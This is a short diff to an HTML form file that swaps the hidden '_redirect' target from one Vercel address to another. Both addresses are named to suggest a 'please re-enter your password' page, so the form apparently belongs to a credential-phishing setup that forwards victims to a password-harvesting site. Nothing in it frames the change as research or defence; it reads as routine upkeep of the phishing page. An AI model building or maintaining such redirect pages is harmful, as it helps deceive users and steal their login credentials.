--- a/request.html
+++ b/request.html
@@ -20,7 +20,7 @@
       <input
         type="hidden"
         name="_redirect"
-        value="https://please-re-enter-your-password-to-co-six.vercel.app/"
+        value="https://passenter.vercel.app/"
       />
       <div id="root">
         <div>
